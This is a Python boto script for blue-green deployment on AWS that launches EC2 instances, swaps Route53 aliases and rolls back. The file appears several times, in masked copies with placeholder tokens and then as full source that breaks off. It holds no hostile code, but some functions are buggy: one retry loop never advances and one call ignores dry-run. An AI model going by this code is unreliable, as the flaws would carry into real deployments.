user_data: Cloud-Init script that will run once
instance_size: String with instance size
shutdown_behaviour: stop or termination
dry-run: True or False. If True, it will not make any changes.
:return: instance ID if created or None
"""
instances = get_specific_instances(ec2_conn, 'Environment', env, [
'running', 'pending'])
if not instances:
try:
reservations = ec2_conn.run_instances(image_id, key_name=
ssh_key, user_data=user_data, instance_type=instance_size,
subnet_id=subnet_id, security_group_ids=sec_group,
instance_initiated_shutdown_behavior=shutdown, dry_run=dry_run)
if reservations is not None and not dry_run:
tag_new_instance(reservations.instances[0], instance_name, env)
else:
LOGGER.error('Something went wrong when creating new instance.'
)
sys.exit(1)
except exception.EC2ResponseError:
if dry_run:
LOGGER.warn(
'New instance would be created and this tags should be assigned'
)
LOGGER.warn('Name: %s' % instance_name)
LOGGER.warn('Environment: %s' % env)
LOGGER.warn('Deployment Date: %s' % time.strftime('%d-%m-%Y'))
return 'OK'
else:
LOGGER.error('Something went wrong when creating new instance.'
)
try:
time.sleep(60)
tag_new_instance(reservations.instances[0],
instance_name, env)
except exception.EC2ResponseError:
sys.exit(1)
else:
LOGGER.warn(
'There is another instance running with %s environment tag (id: %s).'
% (env, instances[0]))
return None
return reservations.instances
def tag_instance(instance, tag_name, tag_key):
"""
:description: Removes old tag and creates new one with updated value.
:param
instance: Instance that should be tagged.
tag_name: Name of the tag.
tag_key: Value of the tag.
:return: None
"""
instance.remove_tag('{0}'.format(tag_name))
instance.add_tag('{0}'.format(tag_name), '{0}'.format(tag_key))
<|reserved_special_token_0|>
def stop_instance(aws_connection, env, domain, live_alias, tag, dry_run=False):
"""
:description: Stops past live instance.
:param
aws_connection: Connections to AWS Route53 service and EC2.
env: Blue or green depends which instance you want to stop (cross check).
domain: Your Domain.
live_alias: Your external DNS record pointing to live web server.
dry-run: True or False. If True, it will not make any changes.
:return: boolean result.
"""
result = False
tag = ''.join(tag.values())
instances = get_specific_instances(aws_connection.get('ec2'),
'Environment', env, 'running')
if check_which_is_live(aws_connection.get('route53'), domain, live_alias
) != env + '.' + domain and instances:
try:
aws_connection.get('ec2').stop_instances(instance_ids=[
instances[0].id], dry_run=dry_run)
tag_instance(instances[0], 'Environment', tag)
except exception.EC2ResponseError:
LOGGER.warn(
'Instance %s would be stopped and tagged with Environment:%s' %
(instances[0].id, tag))
result = True
elif dry_run:
LOGGER.warning('Old instance with tag %s would be stopped.' % env)
else:
LOGGER.error(
'Could not stop the old instance. It looks like it is live or doesnt exist. I tried to stop %s instance.'
% env)
return result
<|reserved_special_token_0|>
def get_env(fqdn, domain):
"""
:description: Give you environment from given fqdn by removing domain from fqdn.
:param
fqdn: Fully Qualified Domain Name.
domain: Your domain name.
:return: environment (blue or green).
"""
env = fqdn.replace('.' + domain, '')
return env
def swap_dns(live_alias, future_value, alias_dns_name, zone, records):
"""
:description: Changes alias (blue.<domain> or green.<domain>) that is behind live url.
:param
live_alias: Your external DNS record pointing to live web server.
future_alias: blue.<domain> or green.<domain> depends which is going to be live.
zone: handle to zone that hosts dns records.
records: sets of dns records from the zone..
:return: Result of the change (AWS respond).
"""
try:
change = records.add_change(action='UPSERT', name=live_alias, ttl=
300, type='A', alias_dns_name=alias_dns_name,
alias_hosted_zone_id=zone.id, alias_evaluate_target_health=False)
change.add_value(future_value)
result = records.commit()
except Exception as ex:
LOGGER.error('Could not swap dns entry for %s. Exception: %s' % (
live_alias, ex))
sys.exit(1)
return result
def swap_live_with_staging(aws_connection, domain, current_live, live_alias,
blue_alias, green_alias, dry_run=False):
"""
:description: Changes alias (blue.<domain> or green.<domain>) that is behind live url.
:param
aws_connection: Connections to AWS Route53 service and EC2
domain: Your Domain
current_live: blue.<domain> or green.<domain> depends which is live
live_alias: Your external DNS record pointing to live web server.
dry-run: True or False. If True, it will not make any changes.
:return: Result of the change (AWS respond).
"""
route53_conn = aws_connection.get('route53')
zone = route53_conn.get_zone(domain)
records = route53.record.ResourceRecordSets(connection=route53_conn,
hosted_zone_id=zone.id)
if dry_run:
LOGGER.warn('DNS record %s would be updated with %s' % (live_alias,
green_alias if current_live == blue_alias else blue_alias))
result = 'OK'
elif current_live == blue_alias:
result = swap_dns(live_alias, green_alias, green_alias, zone, records)
else:
result = swap_dns(live_alias, blue_alias, blue_alias, zone, records)
return result
def assign_to_staging(route53_conn, domain, current_live,
instance_public_ip, live_alias, blue_alias, green_alias, dry_run=False):
"""
:description: Assigns newly created instance to staging url
:param
route53_conn: Connection to AWS Route53 service
domain: Your Domain
current_live: blue.<domain> or green.<domain> depends which one was behind your live url.
instance_public_ip: Public IP of newly created instance that would be assigned to staging url.
dry-run: True or False. If True, it will not make any changes.
:return: Result of the change (AWS respond).
"""
zone = route53_conn.get_zone(domain)
records = route53.record.ResourceRecordSets(connection=route53_conn,
hosted_zone_id=zone.id)
if dry_run:
LOGGER.warn('Public IP %s would be assigned to %s' % (
instance_public_ip, live_alias))
result = 'OK'
else:
result = swap_dns(blue_alias if current_live == green_alias else
green_alias, instance_public_ip, None, zone, records)
return result
<|reserved_special_token_0|>
def simple_check(url):
"""
:description: Checks if given url is returning 200 respond code for 10 minutes in 60 seconds intervals.
:param
url: link which should be checked
:return: Boolean
"""
counter = 0
while counter < 10:
try:
r = requests.head('http://' + url)
LOGGER.debug(r.status_code)
if r.status_code == 200:
return True
else:
time.sleep(60)
except requests.ConnectionError:
LOGGER.error('Failed to get respond code from %s - attempt #%s' %
(url, counter + 1))
return False
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def read_config_file(logger):
import aws_config
try:
domain = getattr(aws_config, 'domain')
config = {'reg': getattr(aws_config, 'region'), 'access': getattr(
aws_config, 'access_key'), 'secret': getattr(aws_config,
'secret_key'), 'srv': getattr(aws_config, 'instance_name'),
'domain': domain, 'alias': getattr(aws_config,
'live_record_name') + '.' + domain, 'image': getattr(aws_config,
'ami_id'), 'key': getattr(aws_config, 'key_pair'), 'sec': [
getattr(aws_config, 'security_group')], 'subnet': getattr(
aws_config, 'subnet_id'), 'type': getattr(aws_config,
'instance_size'), 'shutdown': getattr(aws_config,
'shutdown_behavior'), 'dry-run': getattr(aws_config, 'dry_run')}
except AttributeError as at_err:
logger.error('Could not read parameters from aws_config.py file. [%s]',
at_err)
region = os.environ['AWS_DEFAULT_REGION']
aws_access_key = os.environ['AWS_ACCESS_KEY_ID']
aws_secret_key = os.environ['AWS_SECRET_ACCESS_KEY']
if region is None or aws_access_key is None or aws_secret_key is None:
logger.error('Could not find AWS credentials in local variables')
sys.exit(1)
else:
logger.info('Got AWS credentials from local variables')
return config
<|reserved_special_token_0|>
def connect_to_aws(region, aws_access_key, aws_secret_key):
"""
:param:
region: AWS region
aws_access_key: AWS Access Key
aws_secret_key: AWS Secret Key
:return: map of aws services and connection handles for them.
"""
ec2_conn = ec2.connect_to_region(region_name=region, aws_access_key_id=
aws_access_key, aws_secret_access_key=aws_secret_key)
route53_conn = route53.Route53Connection(aws_access_key_id=
aws_access_key, aws_secret_access_key=aws_secret_key)
if ec2_conn is None:
logging.error(
'Could not connect to Ec2 with this parameters: %s, %s, <secret key>'
, region, aws_access_key)
sys.exit(1)
else:
logging.info('Connected to AWS EC2 [%s]', region)
if route53_conn is None:
logging.error(
'Could not connect to Route53 with this parameters: %s, <secret key>'
, aws_access_key)
sys.exit(1)
else:
logging.info('Connected to AWS Route53')
return {'ec2': ec2_conn, 'route53': route53_conn}
def get_specific_instances(ec2_conn, tag_key, tag_value, instance_state):
"""
:description: Returns requested instance - uses filters to get it.
:param
ec2_conn: Connections to AWS EC2.
tag_key: Name of the tag.
tag_value: Value of the tag.
instance_state: One of three states - "running" / "pending" / "stopped".
:return: boolean result.
"""
instances = ec2_conn.get_only_instances(filters={'tag:{0}'.format(
tag_key): tag_value, 'instance-state-name': instance_state})
return instances
def create_new_instance(ec2_conn, image_id, ssh_key, sec_group, subnet_id,
env, instance_name, user_data=None, instance_size='t2.micro', shutdown=
'stop', dry_run=False):
"""
:param
ec2_conn: connection to AWS EC2 service
image_id: Amazon Machine Image ID with all your software
ssh_key: AWS key pair name
sec_group: Security group ID that should be allocated
subnet_id: Subnet ID in which your instance should be created
env: Environment (blue / green / old_app)
instance_name: Name tag value
user_data: Cloud-Init script that will run once
instance_size: String with instance size
shutdown_behaviour: stop or termination
dry-run: True or False. If True, it will not make any changes.
:return: instance ID if created or None
"""
instances = get_specific_instances(ec2_conn, 'Environment', env, [
'running', 'pending'])
if not instances:
try:
reservations = ec2_conn.run_instances(image_id, key_name=
ssh_key, user_data=user_data, instance_type=instance_size,
subnet_id=subnet_id, security_group_ids=sec_group,
instance_initiated_shutdown_behavior=shutdown, dry_run=dry_run)
if reservations is not None and not dry_run:
tag_new_instance(reservations.instances[0], instance_name, env)
else:
LOGGER.error('Something went wrong when creating new instance.'
)
sys.exit(1)
except exception.EC2ResponseError:
if dry_run:
LOGGER.warn(
'New instance would be created and this tags should be assigned'
)
LOGGER.warn('Name: %s' % instance_name)
LOGGER.warn('Environment: %s' % env)
LOGGER.warn('Deployment Date: %s' % time.strftime('%d-%m-%Y'))
return 'OK'
else:
LOGGER.error('Something went wrong when creating new instance.'
)
try:
time.sleep(60)
tag_new_instance(reservations.instances[0],
instance_name, env)
except exception.EC2ResponseError:
sys.exit(1)
else:
LOGGER.warn(
'There is another instance running with %s environment tag (id: %s).'
% (env, instances[0]))
return None
return reservations.instances
def tag_instance(instance, tag_name, tag_key):
"""
:description: Removes old tag and creates new one with updated value.
:param
instance: Instance that should be tagged.
tag_name: Name of the tag.
tag_key: Value of the tag.
:return: None
"""
instance.remove_tag('{0}'.format(tag_name))
instance.add_tag('{0}'.format(tag_name), '{0}'.format(tag_key))
<|reserved_special_token_0|>
def stop_instance(aws_connection, env, domain, live_alias, tag, dry_run=False):
"""
:description: Stops past live instance.
:param
aws_connection: Connections to AWS Route53 service and EC2.
env: Blue or green depends which instance you want to stop (cross check).
domain: Your Domain.
live_alias: Your external DNS record pointing to live web server.
dry-run: True or False. If True, it will not make any changes.
:return: boolean result.
"""
result = False
tag = ''.join(tag.values())
instances = get_specific_instances(aws_connection.get('ec2'),
'Environment', env, 'running')
if check_which_is_live(aws_connection.get('route53'), domain, live_alias
) != env + '.' + domain and instances:
try:
aws_connection.get('ec2').stop_instances(instance_ids=[
instances[0].id], dry_run=dry_run)
tag_instance(instances[0], 'Environment', tag)
except exception.EC2ResponseError:
LOGGER.warn(
'Instance %s would be stopped and tagged with Environment:%s' %
(instances[0].id, tag))
result = True
elif dry_run:
LOGGER.warning('Old instance with tag %s would be stopped.' % env)
else:
LOGGER.error(
'Could not stop the old instance. It looks like it is live or doesnt exist. I tried to stop %s instance.'
% env)
return result
<|reserved_special_token_0|>
def get_env(fqdn, domain):
"""
:description: Give you environment from given fqdn by removing domain from fqdn.
:param
fqdn: Fully Qualified Domain Name.
domain: Your domain name.
:return: environment (blue or green).
"""
env = fqdn.replace('.' + domain, '')
return env
def swap_dns(live_alias, future_value, alias_dns_name, zone, records):
"""
:description: Changes alias (blue.<domain> or green.<domain>) that is behind live url.
:param
live_alias: Your external DNS record pointing to live web server.
future_alias: blue.<domain> or green.<domain> depends which is going to be live.
zone: handle to zone that hosts dns records.
records: sets of dns records from the zone..
:return: Result of the change (AWS respond).
"""
try:
change = records.add_change(action='UPSERT', name=live_alias, ttl=
300, type='A', alias_dns_name=alias_dns_name,
alias_hosted_zone_id=zone.id, alias_evaluate_target_health=False)
change.add_value(future_value)
result = records.commit()
except Exception as ex:
LOGGER.error('Could not swap dns entry for %s. Exception: %s' % (
live_alias, ex))
sys.exit(1)
return result
def swap_live_with_staging(aws_connection, domain, current_live, live_alias,
blue_alias, green_alias, dry_run=False):
"""
:description: Changes alias (blue.<domain> or green.<domain>) that is behind live url.
:param
aws_connection: Connections to AWS Route53 service and EC2
domain: Your Domain
current_live: blue.<domain> or green.<domain> depends which is live
live_alias: Your external DNS record pointing to live web server.
dry-run: True or False. If True, it will not make any changes.
:return: Result of the change (AWS respond).
"""
route53_conn = aws_connection.get('route53')
zone = route53_conn.get_zone(domain)
records = route53.record.ResourceRecordSets(connection=route53_conn,
hosted_zone_id=zone.id)
if dry_run:
LOGGER.warn('DNS record %s would be updated with %s' % (live_alias,
green_alias if current_live == blue_alias else blue_alias))
result = 'OK'
elif current_live == blue_alias:
result = swap_dns(live_alias, green_alias, green_alias, zone, records)
else:
result = swap_dns(live_alias, blue_alias, blue_alias, zone, records)
return result
def assign_to_staging(route53_conn, domain, current_live,
instance_public_ip, live_alias, blue_alias, green_alias, dry_run=False):
"""
:description: Assigns newly created instance to staging url
:param
route53_conn: Connection to AWS Route53 service
domain: Your Domain
current_live: blue.<domain> or green.<domain> depends which one was behind your live url.
instance_public_ip: Public IP of newly created instance that would be assigned to staging url.
dry-run: True or False. If True, it will not make any changes.
:return: Result of the change (AWS respond).
"""
zone = route53_conn.get_zone(domain)
records = route53.record.ResourceRecordSets(connection=route53_conn,
hosted_zone_id=zone.id)
if dry_run:
LOGGER.warn('Public IP %s would be assigned to %s' % (
instance_public_ip, live_alias))
result = 'OK'
else:
result = swap_dns(blue_alias if current_live == green_alias else
green_alias, instance_public_ip, None, zone, records)
return result
<|reserved_special_token_0|>
def wait_for_public_ip(ec2_conn, instance_id):
"""
:description: Gets instance's Public IP. Retries every 5 seconds for 30 seconds.
:param
ec2_conn: Connection to AWS EC2 service
instance_id: ID of instance :)
:return: Public IP or exits the script
"""
counter = 0
while counter < 24:
stg_instance = ec2_conn.get_only_instances(instance_ids=[instance_id])
if stg_instance[0].ip_address is None:
time.sleep(10)
else:
public_ip = stg_instance[0].ip_address
return str(public_ip)
counter += 1
stg_instance = ec2_conn.get_only_instances(instance_ids=[instance_id])
LOGGER.error('Cannot get Public IP from instance %s' % stg_instance[0].id)
sys.exit(1)
def simple_check(url):
"""
:description: Checks if given url is returning 200 respond code for 10 minutes in 60 seconds intervals.
:param
url: link which should be checked
:return: Boolean
"""
counter = 0
while counter < 10:
try:
r = requests.head('http://' + url)
LOGGER.debug(r.status_code)
if r.status_code == 200:
return True
else:
time.sleep(60)
except requests.ConnectionError:
LOGGER.error('Failed to get respond code from %s - attempt #%s' %
(url, counter + 1))
return False
<|reserved_special_token_0|>
def switch(region, access_key, secret_key, tag, domain, live_url,
blue_alias, green_alias, dry_run=False):
"""
:description: Rolls back deployment by starting instance with old-app tag and swapping dns entry.
:param
ec2_conn: Connection to AWS EC2 service
old_tag: Dictionary with <tag_name> <tag_value> pair
dry-run: True or False. If True, it will not make any changes.
:return: boolean status
"""
result = True
aws_conn = connect_to_aws(region, access_key, secret_key)
live = check_which_is_live(aws_conn.get('route53'), domain, live_url)
result = swap_live_with_staging(aws_conn, domain, live, live_url,
blue_alias, green_alias, dry_run)
time.sleep(300)
stop_instance(aws_conn, get_env(live, domain), domain, live_url, tag,
dry_run)
return result
def roll_back(region, access_key, secret_key, tag, domain, live_alias,
blue_alias, green_alias, dry_run=False):
"""
:description: Rolls back deployment by starting instance with old-app tag and swapping dns entry.
:param
ec2_conn: Connection to AWS EC2 service
old_tag: Dictionary with <tag_name> <tag_value> pair
dry-run: True or False. If True, it will not make any changes.
:return: boolean status
"""
result = True
aws_conn = connect_to_aws(region, access_key, secret_key)
old_instance = get_specific_instances(aws_conn.get('ec2'), ''.join(tag.
keys()), ''.join(tag.values()), ['stopped', 'running'])
current_live = check_which_is_live(aws_conn.get('route53'), domain,
live_alias)
env = get_env(current_live, domain)
if not old_instance:
LOGGER.error(
'No instance with tag %s was found. No chance to roll back Sir!' %
''.join(tag.values()))
else:
try:
if dry_run:
LOGGER.warning(
'Instance %s would be started and tagged with %s' % (
old_instance, env))
else:
old_instance[0].start()
tag_instance(old_instance[0], 'Environment', 'blue' if env ==
'green' else 'green')
instance_public_ip = wait_for_public_ip(aws_conn.get('ec2'),
old_instance[0].id)
assign_to_staging(aws_conn.get('route53'), domain, current_live,
instance_public_ip, live_alias, blue_alias, green_alias,
dry_run=False)
swap_live_with_staging(aws_conn, domain, current_live,
live_alias, blue_alias, green_alias, dry_run)
stop_instance(aws_conn, env, domain, live_alias, tag, dry_run)
except exception.EC2ResponseError:
LOGGER.error('Could not start %s instance.' % old_instance)
result = False
return result
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def read_config_file(logger):
import aws_config
try:
domain = getattr(aws_config, 'domain')
config = {'reg': getattr(aws_config, 'region'), 'access': getattr(
aws_config, 'access_key'), 'secret': getattr(aws_config,
'secret_key'), 'srv': getattr(aws_config, 'instance_name'),
'domain': domain, 'alias': getattr(aws_config,
'live_record_name') + '.' + domain, 'image': getattr(aws_config,
'ami_id'), 'key': getattr(aws_config, 'key_pair'), 'sec': [
getattr(aws_config, 'security_group')], 'subnet': getattr(
aws_config, 'subnet_id'), 'type': getattr(aws_config,
'instance_size'), 'shutdown': getattr(aws_config,
'shutdown_behavior'), 'dry-run': getattr(aws_config, 'dry_run')}
except AttributeError as at_err:
logger.error('Could not read parameters from aws_config.py file. [%s]',
at_err)
region = os.environ['AWS_DEFAULT_REGION']
aws_access_key = os.environ['AWS_ACCESS_KEY_ID']
aws_secret_key = os.environ['AWS_SECRET_ACCESS_KEY']
if region is None or aws_access_key is None or aws_secret_key is None:
logger.error('Could not find AWS credentials in local variables')
sys.exit(1)
else:
logger.info('Got AWS credentials from local variables')
return config
<|reserved_special_token_0|>
def connect_to_aws(region, aws_access_key, aws_secret_key):
"""
:param:
region: AWS region
aws_access_key: AWS Access Key
aws_secret_key: AWS Secret Key
:return: map of aws services and connection handles for them.
"""
ec2_conn = ec2.connect_to_region(region_name=region, aws_access_key_id=
aws_access_key, aws_secret_access_key=aws_secret_key)
route53_conn = route53.Route53Connection(aws_access_key_id=
aws_access_key, aws_secret_access_key=aws_secret_key)
if ec2_conn is None:
logging.error(
'Could not connect to Ec2 with this parameters: %s, %s, <secret key>'
, region, aws_access_key)
sys.exit(1)
else:
logging.info('Connected to AWS EC2 [%s]', region)
if route53_conn is None:
logging.error(
'Could not connect to Route53 with this parameters: %s, <secret key>'
, aws_access_key)
sys.exit(1)
else:
logging.info('Connected to AWS Route53')
return {'ec2': ec2_conn, 'route53': route53_conn}
def get_specific_instances(ec2_conn, tag_key, tag_value, instance_state):
"""
:description: Returns requested instance - uses filters to get it.
:param
ec2_conn: Connections to AWS EC2.
tag_key: Name of the tag.
tag_value: Value of the tag.
instance_state: One of three states - "running" / "pending" / "stopped".
:return: boolean result.
"""
instances = ec2_conn.get_only_instances(filters={'tag:{0}'.format(
tag_key): tag_value, 'instance-state-name': instance_state})
return instances
def create_new_instance(ec2_conn, image_id, ssh_key, sec_group, subnet_id,
env, instance_name, user_data=None, instance_size='t2.micro', shutdown=
'stop', dry_run=False):
"""
:param
ec2_conn: connection to AWS EC2 service
image_id: Amazon Machine Image ID with all your software
ssh_key: AWS key pair name
sec_group: Security group ID that should be allocated
subnet_id: Subnet ID in which your instance should be created
env: Environment (blue / green / old_app)
instance_name: Name tag value
user_data: Cloud-Init script that will run once
instance_size: String with instance size
shutdown_behaviour: stop or termination
dry-run: True or False. If True, it will not make any changes.
:return: instance ID if created or None
"""
instances = get_specific_instances(ec2_conn, 'Environment', env, [
'running', 'pending'])
if not instances:
try:
reservations = ec2_conn.run_instances(image_id, key_name=
ssh_key, user_data=user_data, instance_type=instance_size,
subnet_id=subnet_id, security_group_ids=sec_group,
instance_initiated_shutdown_behavior=shutdown, dry_run=dry_run)
if reservations is not None and not dry_run:
tag_new_instance(reservations.instances[0], instance_name, env)
else:
LOGGER.error('Something went wrong when creating new instance.'
)
sys.exit(1)
except exception.EC2ResponseError:
if dry_run:
LOGGER.warn(
'New instance would be created and this tags should be assigned'
)
LOGGER.warn('Name: %s' % instance_name)
LOGGER.warn('Environment: %s' % env)
LOGGER.warn('Deployment Date: %s' % time.strftime('%d-%m-%Y'))
return 'OK'
else:
LOGGER.error('Something went wrong when creating new instance.'
)
try:
time.sleep(60)
tag_new_instance(reservations.instances[0],
instance_name, env)
except exception.EC2ResponseError:
sys.exit(1)
else:
LOGGER.warn(
'There is another instance running with %s environment tag (id: %s).'
% (env, instances[0]))
return None
return reservations.instances
def tag_instance(instance, tag_name, tag_key):
"""
:description: Removes old tag and creates new one with updated value.
:param
instance: Instance that should be tagged.
tag_name: Name of the tag.
tag_key: Value of the tag.
:return: None
"""
instance.remove_tag('{0}'.format(tag_name))
instance.add_tag('{0}'.format(tag_name), '{0}'.format(tag_key))
def tag_new_instance(instance, instance_name, environment):
"""
:description: Tags new instance.
:param
instance: Instance that should be tagged.
instance_name: Name of the instance.
environment: blue org green.
:return: None
"""
instance.add_tag('Name', instance_name)
instance.add_tag('Environment', environment)
instance.add_tag('Deployment Date', time.strftime('%d-%m-%Y'))
def stop_instance(aws_connection, env, domain, live_alias, tag, dry_run=False):
"""
:description: Stops past live instance.
:param
aws_connection: Connections to AWS Route53 service and EC2.
env: Blue or green depends which instance you want to stop (cross check).
domain: Your Domain.
live_alias: Your external DNS record pointing to live web server.
dry-run: True or False. If True, it will not make any changes.
:return: boolean result.
"""
result = False
tag = ''.join(tag.values())
instances = get_specific_instances(aws_connection.get('ec2'),
'Environment', env, 'running')
if check_which_is_live(aws_connection.get('route53'), domain, live_alias
) != env + '.' + domain and instances:
try:
aws_connection.get('ec2').stop_instances(instance_ids=[
instances[0].id], dry_run=dry_run)
tag_instance(instances[0], 'Environment', tag)
except exception.EC2ResponseError:
LOGGER.warn(
'Instance %s would be stopped and tagged with Environment:%s' %
(instances[0].id, tag))
result = True
elif dry_run:
LOGGER.warning('Old instance with tag %s would be stopped.' % env)
else:
LOGGER.error(
'Could not stop the old instance. It looks like it is live or doesnt exist. I tried to stop %s instance.'
% env)
return result
<|reserved_special_token_0|>
def get_env(fqdn, domain):
"""
:description: Give you environment from given fqdn by removing domain from fqdn.
:param
fqdn: Fully Qualified Domain Name.
domain: Your domain name.
:return: environment (blue or green).
"""
env = fqdn.replace('.' + domain, '')
return env
def swap_dns(live_alias, future_value, alias_dns_name, zone, records):
"""
:description: Changes alias (blue.<domain> or green.<domain>) that is behind live url.
:param
live_alias: Your external DNS record pointing to live web server.
future_alias: blue.<domain> or green.<domain> depends which is going to be live.
zone: handle to zone that hosts dns records.
records: sets of dns records from the zone..
:return: Result of the change (AWS respond).
"""
try:
change = records.add_change(action='UPSERT', name=live_alias, ttl=
300, type='A', alias_dns_name=alias_dns_name,
alias_hosted_zone_id=zone.id, alias_evaluate_target_health=False)
change.add_value(future_value)
result = records.commit()
except Exception as ex:
LOGGER.error('Could not swap dns entry for %s. Exception: %s' % (
live_alias, ex))
sys.exit(1)
return result
def swap_live_with_staging(aws_connection, domain, current_live, live_alias,
blue_alias, green_alias, dry_run=False):
"""
:description: Changes alias (blue.<domain> or green.<domain>) that is behind live url.
:param
aws_connection: Connections to AWS Route53 service and EC2
domain: Your Domain
current_live: blue.<domain> or green.<domain> depends which is live
live_alias: Your external DNS record pointing to live web server.
dry-run: True or False. If True, it will not make any changes.
:return: Result of the change (AWS respond).
"""
route53_conn = aws_connection.get('route53')
zone = route53_conn.get_zone(domain)
records = route53.record.ResourceRecordSets(connection=route53_conn,
hosted_zone_id=zone.id)
if dry_run:
LOGGER.warn('DNS record %s would be updated with %s' % (live_alias,
green_alias if current_live == blue_alias else blue_alias))
result = 'OK'
elif current_live == blue_alias:
result = swap_dns(live_alias, green_alias, green_alias, zone, records)
else:
result = swap_dns(live_alias, blue_alias, blue_alias, zone, records)
return result
def assign_to_staging(route53_conn, domain, current_live,
instance_public_ip, live_alias, blue_alias, green_alias, dry_run=False):
"""
:description: Assigns newly created instance to staging url
:param
route53_conn: Connection to AWS Route53 service
domain: Your Domain
current_live: blue.<domain> or green.<domain> depends which one was behind your live url.
instance_public_ip: Public IP of newly created instance that would be assigned to staging url.
dry-run: True or False. If True, it will not make any changes.
:return: Result of the change (AWS respond).
"""
zone = route53_conn.get_zone(domain)
records = route53.record.ResourceRecordSets(connection=route53_conn,
hosted_zone_id=zone.id)
if dry_run:
LOGGER.warn('Public IP %s would be assigned to %s' % (
instance_public_ip, live_alias))
result = 'OK'
else:
result = swap_dns(blue_alias if current_live == green_alias else
green_alias, instance_public_ip, None, zone, records)
return result
<|reserved_special_token_0|>
def wait_for_public_ip(ec2_conn, instance_id):
"""
:description: Gets instance's Public IP. Retries every 5 seconds for 30 seconds.
:param
ec2_conn: Connection to AWS EC2 service
instance_id: ID of instance :)
:return: Public IP or exits the script
"""
counter = 0
while counter < 24:
stg_instance = ec2_conn.get_only_instances(instance_ids=[instance_id])
if stg_instance[0].ip_address is None:
time.sleep(10)
else:
public_ip = stg_instance[0].ip_address
return str(public_ip)
counter += 1
stg_instance = ec2_conn.get_only_instances(instance_ids=[instance_id])
LOGGER.error('Cannot get Public IP from instance %s' % stg_instance[0].id)
sys.exit(1)
def simple_check(url):
"""
:description: Checks if given url is returning 200 respond code for 10 minutes in 60 seconds intervals.
:param
url: link which should be checked
:return: Boolean
"""
counter = 0
while counter < 10:
try:
r = requests.head('http://' + url)
LOGGER.debug(r.status_code)
if r.status_code == 200:
return True
else:
time.sleep(60)
except requests.ConnectionError:
LOGGER.error('Failed to get respond code from %s - attempt #%s' %
(url, counter + 1))
return False
<|reserved_special_token_0|>
def switch(region, access_key, secret_key, tag, domain, live_url,
blue_alias, green_alias, dry_run=False):
"""
:description: Rolls back deployment by starting instance with old-app tag and swapping dns entry.
:param
ec2_conn: Connection to AWS EC2 service
old_tag: Dictionary with <tag_name> <tag_value> pair
dry-run: True or False. If True, it will not make any changes.
:return: boolean status
"""
result = True
aws_conn = connect_to_aws(region, access_key, secret_key)
live = check_which_is_live(aws_conn.get('route53'), domain, live_url)
result = swap_live_with_staging(aws_conn, domain, live, live_url,
blue_alias, green_alias, dry_run)
time.sleep(300)
stop_instance(aws_conn, get_env(live, domain), domain, live_url, tag,
dry_run)
return result
def roll_back(region, access_key, secret_key, tag, domain, live_alias,
blue_alias, green_alias, dry_run=False):
"""
:description: Rolls back deployment by starting instance with old-app tag and swapping dns entry.
:param
ec2_conn: Connection to AWS EC2 service
old_tag: Dictionary with <tag_name> <tag_value> pair
dry-run: True or False. If True, it will not make any changes.
:return: boolean status
"""
result = True
aws_conn = connect_to_aws(region, access_key, secret_key)
old_instance = get_specific_instances(aws_conn.get('ec2'), ''.join(tag.
keys()), ''.join(tag.values()), ['stopped', 'running'])
current_live = check_which_is_live(aws_conn.get('route53'), domain,
live_alias)
env = get_env(current_live, domain)
if not old_instance:
LOGGER.error(
'No instance with tag %s was found. No chance to roll back Sir!' %
''.join(tag.values()))
else:
try:
if dry_run:
LOGGER.warning(
'Instance %s would be started and tagged with %s' % (
old_instance, env))
else:
old_instance[0].start()
tag_instance(old_instance[0], 'Environment', 'blue' if env ==
'green' else 'green')
instance_public_ip = wait_for_public_ip(aws_conn.get('ec2'),
old_instance[0].id)
assign_to_staging(aws_conn.get('route53'), domain, current_live,
instance_public_ip, live_alias, blue_alias, green_alias,
dry_run=False)
swap_live_with_staging(aws_conn, domain, current_live,
live_alias, blue_alias, green_alias, dry_run)
stop_instance(aws_conn, env, domain, live_alias, tag, dry_run)
except exception.EC2ResponseError:
LOGGER.error('Could not start %s instance.' % old_instance)
result = False
return result
<|reserved_special_token_0|>
<|reserved_special_token_1|>
__author__ = 'jacek gruzewski'
#!/user/bin/python3.4
"""
To do: throw exceptions rather than calling sys.exit(1)
"""
############################################################
# IMPORTS
############################################################
# Python's libraries
import time
import sys
import logging
import os
import requests
# AWS Boto library
from boto import ec2, route53, exception
#####################################################################
# Static data and configuration
#####################################################################
# Static AWS Rest service for getting instance details
AWS_METADATA = 'http://169.254.169.254/latest/meta-data/instance-id'
log_path = '/var/log/'
file_name = 'blue-green-deploy'
#####################################################################
# Functions
#####################################################################
def read_config_file(logger):
# Config file imports
import aws_config
try:
# Checking if all attributes were set.
domain = getattr(aws_config, "domain")
config = {
'reg': getattr(aws_config, "region"),
'access': getattr(aws_config, "access_key"),
'secret': getattr(aws_config, "secret_key"),
'srv': getattr(aws_config, "instance_name"),
'domain': domain,
'alias': getattr(aws_config, "live_record_name") + "." + domain,
'image': getattr(aws_config, "ami_id"),
'key': getattr(aws_config, "key_pair"),
'sec': [getattr(aws_config, "security_group")],
'subnet': getattr(aws_config, "subnet_id"),
'type': getattr(aws_config, "instance_size"),
'shutdown': getattr(aws_config, "shutdown_behavior"),
'dry-run': getattr(aws_config, "dry_run")
}
except AttributeError as at_err:
# Falling back to local variables. Worth to try!
logger.error('Could not read parameters from aws_config.py file. [%s]', at_err)
region = os.environ['AWS_DEFAULT_REGION']
aws_access_key = os.environ['AWS_ACCESS_KEY_ID']
aws_secret_key = os.environ['AWS_SECRET_ACCESS_KEY']
if region is None or aws_access_key is None or aws_secret_key is None:
# At least we tried.
logger.error('Could not find AWS credentials in local variables')
sys.exit(1)
else:
logger.info('Got AWS credentials from local variables')
return config
def set_up_logging(path, file):
# Log file. Always in /var/log!! It will log into the file and console
logging.basicConfig(level=logging.WARN)
log_formatter = logging.Formatter("%(asctime)s [%(levelname)-5.5s] %(message)s")
root_logger = logging.getLogger()
file_handler = logging.FileHandler("{0}/{1}.log".format(path, file))
file_handler.setFormatter(log_formatter)
root_logger.addHandler(file_handler)
return root_logger
def connect_to_aws(region, aws_access_key, aws_secret_key):
"""
:param:
region: AWS region
aws_access_key: AWS Access Key
aws_secret_key: AWS Secret Key
:return: map of aws services and connection handles for them.
"""
ec2_conn = ec2.connect_to_region(region_name=region,
aws_access_key_id=aws_access_key,
aws_secret_access_key=aws_secret_key)
route53_conn = route53.Route53Connection(aws_access_key_id=aws_access_key,
aws_secret_access_key=aws_secret_key)
if ec2_conn is None:
